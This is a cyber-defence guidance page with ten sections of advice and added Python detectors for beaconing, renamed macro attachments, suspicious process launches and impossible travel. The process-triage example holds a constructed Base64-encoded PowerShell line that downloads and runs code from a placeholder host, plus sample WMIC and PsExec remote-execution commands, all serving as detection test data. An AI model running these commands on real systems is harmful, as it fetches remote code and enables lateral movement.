Reviewing cyber-defences at a time of intensified threat


The NCSC has called for organisations to bolster their online defences, due to recent events on the world stage. We have compiled a list of our guidance and advice to help your organisation review its Cyber Security Controls and threat detection measures.

  1. Low Hanging Fruit – remove your vulnerabilities.
    • Ensure your critical assets and published services are sufficiently patched to remove remotely exploitable vulnerabilities.
    • Re-evaluate the business case and risk of every externally facing service. Is it really needed? If not, turn it off.
    • Complete a vulnerability assessment across all your exposed systems to better understand potential vulnerabilities.
    • Maintain a consistent patch management process to ensure all assets are routinely patched and/or upgraded to remove known vulnerabilities.

    What are my critical assets? Critical assets are resources essential to maintaining operations and achieving your organisation’s mission. They could be hardware, software, data, patents/copyrights, research, processes, or services.

  2. Watch your outbound traffic – is anyone calling home?
    • If you have the capacity, watch your outbound traffic, particularly from assets that will respond to external requests, such as file transfer, mail and web servers.
    • Remember: Servers hosting external services should be confined to a DMZ to protect your other organisational assets from potential compromise and lateral movement.
    • Review your firewall exceptions and justify every current rule. Remove anything using unencrypted or otherwise insecure protocols.
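Watching outbound traffic is only useful if you can tell a timer-driven implant from normal server chatter. The following added example (not code from the original page or from the NCSC) groups exported flow records by source, destination and port and flags groups whose connection intervals are almost constant. The flow records, host name and IP addresses are constructed for the demonstration; the 10% jitter threshold and the five-connection minimum are assumptions you would tune against your own baseline.

```python
from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev

# Constructed sample of outbound flows from a DMZ web server, as they might be
# exported from a firewall or NetFlow collector: (timestamp, src_host, dst_ip,
# dst_port). Addresses are from documentation ranges; this is not real traffic.
SAMPLE_FLOWS = [
    # Expected: irregular update checks to a known vendor endpoint
    ("2024-03-01T09:02:11", "web01", "198.51.100.20", 443),
    ("2024-03-01T11:47:30", "web01", "198.51.100.20", 443),
    ("2024-03-01T16:05:02", "web01", "198.51.100.20", 443),
    # Suspicious: connections to an unknown host every five minutes, almost to the second
    ("2024-03-01T09:00:00", "web01", "203.0.113.7", 8443),
    ("2024-03-01T09:05:01", "web01", "203.0.113.7", 8443),
    ("2024-03-01T09:10:00", "web01", "203.0.113.7", 8443),
    ("2024-03-01T09:15:02", "web01", "203.0.113.7", 8443),
    ("2024-03-01T09:20:00", "web01", "203.0.113.7", 8443),
    ("2024-03-01T09:25:01", "web01", "203.0.113.7", 8443),
]

def find_beacons(flows, min_count=5, max_jitter=0.1):
    """Group flows by (src, dst, port) and flag groups whose inter-connection
    intervals are almost constant. Jitter is the population standard deviation
    of the gaps divided by their mean: genuine user or update traffic is bursty
    and scores well above max_jitter, a timer-driven implant scores near zero."""
    groups = defaultdict(list)
    for ts, src, dst, port in flows:
        groups[(src, dst, port)].append(datetime.fromisoformat(ts))

    findings = []
    for (src, dst, port), times in groups.items():
        if len(times) < min_count:
            continue  # too few samples to judge periodicity
        times.sort()
        gaps = [(later - earlier).total_seconds()
                for earlier, later in zip(times, times[1:])]
        avg = mean(gaps)
        if avg <= 0:
            continue  # duplicate timestamps, not a periodic pattern
        jitter = pstdev(gaps) / avg
        if jitter <= max_jitter:
            findings.append({"src": src, "dst": dst, "port": port,
                             "count": len(times), "interval_s": round(avg),
                             "jitter": round(jitter, 3)})
    return findings

if __name__ == "__main__":
    for f in find_beacons(SAMPLE_FLOWS):
        print(f"possible beacon: {f['src']} -> {f['dst']}:{f['port']} "
              f"every ~{f['interval_s']}s ({f['count']} connections, jitter {f['jitter']})")
```

Run against the constructed sample, the three update checks are dropped for having too few samples and the 203.0.113.7:8443 group is reported as a ~300 second beacon. Real implants add random sleep jitter, so in practice you would raise `max_jitter` and add a whitelist of known vendor destinations rather than rely on the threshold alone.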
  3. Inbound Communication and controls – the bare minimum.
    • Ensure your email system and filtering system is not delivering suspect messages to mailboxes. By default, messages are often sent to the Junk Mailbox folder rather than being explicitly blocked.
    • Ensure your email DNS records are appropriately configured to prevent spoofing.
    • Ensure commonly exploited attachment types are blocked. This includes macro-enabled Office documents, compressed files, HTA files, and scripts such as Batch, VBScript, PowerShell, Python and bash.
      • Your allowed attachments list should be very small:
        • PDF / DOC(X) / XLS(X) / PPT(X). Note that the legacy binary formats (DOC, XLS, PPT) can themselves carry macros, whereas DOCX/XLSX/PPTX cannot, and that a macro-enabled file renamed to .docx still contains the macro. Judge attachments by their content, not only by their extension.
    • On the flip side, ensure your mail system will not allow critical files to be sent externally, this may include log files, certificates and files containing financial or personal information.
    • Review other collaboration tools to ensure public communication is restricted. This may be a way for malicious actors to circumvent some of your well positioned controls.
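An extension allow list is the easy part of the attachment control above; the part that catches people out is that the name of a file says little about its content. The following added example (not code from the original page or from any mail filtering product) applies the page's allow list, then inspects OOXML attachments for a VBA project part so that a `.docm` renamed to `.docx` is still blocked, and sends legacy binary Office formats for review because they can carry macros. The `evaluate_attachment` function, the minimal zip containers and the file names are constructed for the demonstration.

```python
import io
import zipfile
from pathlib import PurePosixPath

# Extension allow list from the guidance above; everything else is rejected.
ALLOWED_EXTENSIONS = {".pdf", ".doc", ".docx", ".xls", ".xlsx", ".ppt", ".pptx"}

# Legacy binary Office formats can embed VBA macros, so they need content inspection.
LEGACY_OFFICE = {".doc", ".xls", ".ppt"}

# Macro-enabled OOXML files carry the VBA project in one of these zip members.
# A .docm/.xlsm/.pptm renamed to .docx/.xlsx/.pptx still contains it.
OOXML_MACRO_PARTS = ("word/vbaProject.bin", "xl/vbaProject.bin", "ppt/vbaProject.bin")

def ooxml_has_macros(data: bytes) -> bool:
    """Return True if an OOXML container (a zip archive) contains a VBA project part."""
    try:
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            names = set(zf.namelist())
    except zipfile.BadZipFile:
        return False
    return any(part in names for part in OOXML_MACRO_PARTS)

def evaluate_attachment(filename: str, data: bytes) -> tuple:
    """Decide whether an attachment should be delivered.
    Returns (verdict, reason) with verdict one of 'allow', 'block' or 'review'."""
    # Judge on the final suffix only: 'invoice.pdf.hta' is an HTA file, not a PDF.
    ext = PurePosixPath(filename.lower()).suffix
    if ext not in ALLOWED_EXTENSIONS:
        return "block", f"extension {ext or '(none)'} is not on the allow list"
    if ext in LEGACY_OFFICE:
        return "review", "legacy binary Office format may contain macros"
    if ext != ".pdf":
        if not data.startswith(b"PK"):
            return "block", "extension claims OOXML but content is not a zip container"
        if ooxml_has_macros(data):
            return "block", "OOXML container carries vbaProject.bin (renamed macro-enabled file)"
    return "allow", "ok"

def build_ooxml(parts: dict) -> bytes:
    """Constructed minimal zip with the given members; enough to exercise the
    checks above, not a valid Word document."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, content in parts.items():
            zf.writestr(name, content)
    return buf.getvalue()

# Constructed test attachments
CLEAN_DOCX = build_ooxml({"[Content_Types].xml": b"<Types/>",
                          "word/document.xml": b"<w:document/>"})
MACRO_DOCX = build_ooxml({"[Content_Types].xml": b"<Types/>",
                          "word/document.xml": b"<w:document/>",
                          "word/vbaProject.bin": b"\x00constructed-stub"})
SAMPLE_ATTACHMENTS = [
    ("quarterly-report.docx", CLEAN_DOCX),
    ("quarterly-report.docx", MACRO_DOCX),   # macro-enabled file renamed to .docx
    ("invoice.pdf.hta", b"<html><script>"),  # double extension
    ("old-contract.doc", b"\xd0\xcf\x11\xe0"),
    ("brief.pdf", b"%PDF-1.7"),
]

if __name__ == "__main__":
    for name, content in SAMPLE_ATTACHMENTS:
        verdict, reason = evaluate_attachment(name, content)
        print(f"{verdict:6} {name:24} {reason}")
```

The `review` verdict for legacy formats is deliberate: a production filter would hand those to a parser such as oletools rather than block every `.doc`, but the point stands that DOC/XLS/PPT on the allow list is not macro-free.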
  4. Baseline your environment – understand what is normal.
    • It is crucial to understand what is normal communication within your environment. Minimising noisy outbound connections will help you better understand potentially malicious or undocumented communication.
    • Approve and control your applications. Restricting the ability for users to launch/install unapproved applications and scripts will help restrict some malicious applications from launching.
    • Windows and Enterprise Linux have built-in application control and auditing features that can help you achieve this, such as AppLocker on Windows (with SRUM, the System Resource Usage Monitor, as a record of historical usage) and auditd or fapolicyd on Enterprise Linux. This may not be achievable for everyone; however, understanding your application usage will give you a boost in identifying anything potentially rogue or malicious.
    • If you don’t have an EDR (Endpoint Detection and Response) platform, consider implementing a system resource monitor to enable you to review long-term system usage and baseline applications.
  5. Monitor native Windows/Linux system tools – living off the land.
    • If a system is compromised by an advanced threat actor, they are unlikely to start dropping files and launching their own applications. They will attempt to “live off the land” and use existing system tools to open backdoors or move data.
    • By default, EDR and SIEM tools are unlikely to identify threats from built-in system tools unless detections have been specifically crafted for them.
    • Ensure you monitor usage of common system management tools such as PowerShell, batch scripts, WMIC, telnet, PsExec, and Hyper-V/VirtualBox/VMware. Unless you are an administrator you are unlikely to be using these tools.
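Monitoring the tools listed above means writing the detection that EDR and SIEM products do not ship by default: who ran the tool, from what parent, and with what arguments. The following added example (not code from the original page or from any EDR vendor) triages constructed process-creation events in the shape of Windows Security 4688 or Sysmon event 1 records. It flags management tools run by non-administrative accounts, Office applications spawning a shell, Base64-encoded PowerShell commands (decoded so the analyst sees the real command), and WMIC or PsExec aimed at a remote host. The `adm-` naming convention for administrator accounts, the user and host names and the sample events are assumptions made for the demonstration.

```python
import base64
import re

# Assumed naming convention: administrative accounts carry an 'adm-' prefix.
ADMIN_PREFIX = "adm-"
ADMIN_TOOLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wmic.exe",
               "psexec.exe", "telnet.exe"}
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
REMOTE_TOOLS = {"wmic.exe", "psexec.exe"}

# Constructed payload: what a phishing macro typically hands to PowerShell.
# PowerShell -EncodedCommand expects Base64 over UTF-16LE text.
ENCODED_PAYLOAD = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.7/a')"
    .encode("utf-16le")).decode("ascii")

# Constructed process-creation events (4688 / Sysmon 1 style). Not real logs.
SAMPLE_EVENTS = [
    {"user": "CORP\\jsmith", "parent": "explorer.exe", "image": "winword.exe",
     "cmdline": r'"C:\Program Files\Microsoft Office\WINWORD.EXE" /n report.docx'},
    {"user": "CORP\\jsmith", "parent": "winword.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc " + ENCODED_PAYLOAD},
    {"user": "CORP\\svc-backup", "parent": "services.exe", "image": "wmic.exe",
     "cmdline": "wmic /node:fileserver01 process call create cmd.exe"},
    {"user": "CORP\\adm-kpatel", "parent": "cmd.exe", "image": "psexec.exe",
     "cmdline": r"psexec.exe \\fileserver01 -s cmd.exe"},
    {"user": "CORP\\adm-kpatel", "parent": "cmd.exe", "image": "powershell.exe",
     "cmdline": r"powershell.exe -File C:\scripts\patch.ps1"},
]

def decode_encoded_command(cmdline):
    """Return the plaintext of a -e/-enc/-EncodedCommand argument, or None."""
    m = re.search(r"-(?:e|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", cmdline, re.I)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None

def is_admin(user):
    return user.split("\\")[-1].lower().startswith(ADMIN_PREFIX)

def triage_event(ev):
    """Return the list of reasons an event deserves analyst attention (empty if none)."""
    reasons = []
    image = ev["image"].lower()
    parent = ev["parent"].lower()
    if image in ADMIN_TOOLS and not is_admin(ev["user"]):
        reasons.append(f"{image} run by non-administrative account")
    if parent in OFFICE_PARENTS and image in ADMIN_TOOLS:
        reasons.append(f"{image} spawned by Office application {parent}")
    decoded = decode_encoded_command(ev["cmdline"])
    if decoded is not None:
        reasons.append("encoded PowerShell command: " + decoded[:80])
    # /node: (WMIC) or \\host (PsExec) means the tool is driving another machine.
    if image in REMOTE_TOOLS and re.search(r"/node:|\\\\\S+", ev["cmdline"]):
        reasons.append(f"{image} targeting a remote host (possible lateral movement)")
    return reasons

def triage(events):
    """Keep only events with at least one reason, in input order."""
    results = []
    for ev in events:
        reasons = triage_event(ev)
        if reasons:
            results.append({"user": ev["user"], "image": ev["image"], "reasons": reasons})
    return results

if __name__ == "__main__":
    for hit in triage(SAMPLE_EVENTS):
        print(f"{hit['user']} {hit['image']}")
        for r in hit["reasons"]:
            print("   -", r)
```

Note that the administrator's PsExec session is still reported: being an admin explains the tool, not the remote target, and that is exactly the event a baseline (section 4) lets you confirm or escalate quickly.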
  6. Roles and Responsibility – least privilege.
    • Ensure your users are only assigned rights to access what they need to perform their roles. If compromised, an over-privileged user gives an attacker a simple route to your organisation’s most critical and sensitive systems.
    • Give administrators separate privileged accounts, used only for administrative tasks, so that time spent signed in with elevated rights is kept to the bare minimum.
    • Consider implementing a privileged access management tool to minimise risk by controlling access to credentials, understanding usage and limiting usage to defined periods.
    • Super user accounts should not have access to browse the web or email to limit potential compromise opportunities.
  7. Additional authentication and sign in.
    • Protect your user accounts with additional authentication. Multi-factor authentication is now widely supported by SaaS/IaaS providers. It should be enabled for all your Microsoft 365 users.
    • If MFA is not practical, consider alternative protections such as conditional access policies or risk-based sign-in analysis. However, these features usually come at additional licensing cost.
    • Review your user sign in locations and impossible travel events.
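Reviewing impossible travel by eye does not scale past a handful of users. The following added example (not code from the original page or from Microsoft's identity protection features) takes sign-in events already enriched with a location, sorts them per user, and alerts when the distance between consecutive sign-ins could not have been covered at a plausible speed. The sign-in records, user names, IP addresses and the 900 km/h threshold (roughly airline cruising speed) are constructed assumptions; coordinates are approximate city centres.

```python
from collections import defaultdict
from datetime import datetime
from math import asin, cos, radians, sin, sqrt

# Constructed sign-in events: (user, ISO timestamp in UTC, latitude, longitude,
# source IP). Addresses are from documentation ranges; this is not real data.
SAMPLE_SIGNINS = [
    ("a.jones", "2024-03-04T08:15:00", 51.75, -1.26, "198.51.100.10"),   # Oxford
    ("a.jones", "2024-03-04T08:52:00", 51.51, -0.13, "198.51.100.11"),   # London
    ("a.jones", "2024-03-04T09:30:00", 55.75, 37.62, "203.0.113.40"),    # Moscow
    ("b.khan",  "2024-03-04T07:00:00", 40.71, -74.01, "198.51.100.50"),  # New York
    ("b.khan",  "2024-03-04T19:30:00", 51.51, -0.13, "198.51.100.51"),   # London
]

def haversine_km(lat1, lon1, lat2, lon2):
    """Great-circle distance between two points on a sphere of Earth's radius."""
    earth_radius_km = 6371.0
    dlat = radians(lat2 - lat1)
    dlon = radians(lon2 - lon1)
    a = sin(dlat / 2) ** 2 + cos(radians(lat1)) * cos(radians(lat2)) * sin(dlon / 2) ** 2
    return 2 * earth_radius_km * asin(sqrt(a))

def impossible_travel(signins, max_speed_kmh=900.0, min_distance_km=50.0):
    """Flag consecutive sign-ins by the same user that imply travel faster than
    max_speed_kmh. Pairs closer than min_distance_km are ignored so that
    geolocation wobble inside one city does not raise alerts."""
    by_user = defaultdict(list)
    for user, ts, lat, lon, ip in signins:
        by_user[user].append((datetime.fromisoformat(ts), lat, lon, ip))

    alerts = []
    for user, events in by_user.items():
        events.sort(key=lambda e: e[0])
        for prev, cur in zip(events, events[1:]):
            distance = haversine_km(prev[1], prev[2], cur[1], cur[2])
            if distance < min_distance_km:
                continue
            hours = (cur[0] - prev[0]).total_seconds() / 3600
            # Same timestamp from two distant places is trivially impossible.
            speed = float("inf") if hours <= 0 else distance / hours
            if speed > max_speed_kmh:
                alerts.append({"user": user, "from_ip": prev[3], "to_ip": cur[3],
                               "distance_km": round(distance), "minutes": round(hours * 60),
                               "speed_kmh": round(speed)})
    return alerts

if __name__ == "__main__":
    for a in impossible_travel(SAMPLE_SIGNINS):
        print(f"{a['user']}: {a['from_ip']} -> {a['to_ip']} covers {a['distance_km']} km "
              f"in {a['minutes']} min ({a['speed_kmh']} km/h)")
```

On the constructed data the Oxford to London hop and the New York to London flight pass, while the London to Moscow sign-in 38 minutes later is reported. Before acting on such an alert, check whether the second address belongs to a VPN or cloud proxy, which is the most common benign cause.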
  8. Plan for the worst – you need an incident response plan.
    • Once you have reviewed your critical assets and potential threats, you should build an Incident Response Plan around them.
    • Your Incident Response Plan must enable you to isolate incidents quickly; all involved parties must understand what is expected of them, and the plan must be tested.
    • If you have sensitive data in your environment, consider your obligations: do you have the skills and resources on hand to collect forensic data?
  9. User Awareness and Threat Intelligence – understanding potential threats.
    • Ensure your staff are aware of potential threats via phishing. These are getting harder to spot but they are all too common. The NCSC have recently reported that 91% of UK organisations have been the subject of a successful attack.
    • Subscribe to threat intelligence feeds to understand the threats targeting organisations in your country. This can allow you to pre-emptively implement mitigations and resolve vulnerabilities/zero-days before they are targeted.
  10. A compromise may not always be direct – review your supply chain.
    • Ensure due diligence is completed within your supply chain by making sure your suppliers have:
      • A mature and resourced cyber security programme.
      • Clear security assurance and risk management processes.
      • Defined product support lifecycles for all hardware, software and services.
      • The ability to support your data protection requirements and disaster recovery processes.
      • A verifiable track record and reputation.

If you need any further guidance or require a security assessment, get in touch.
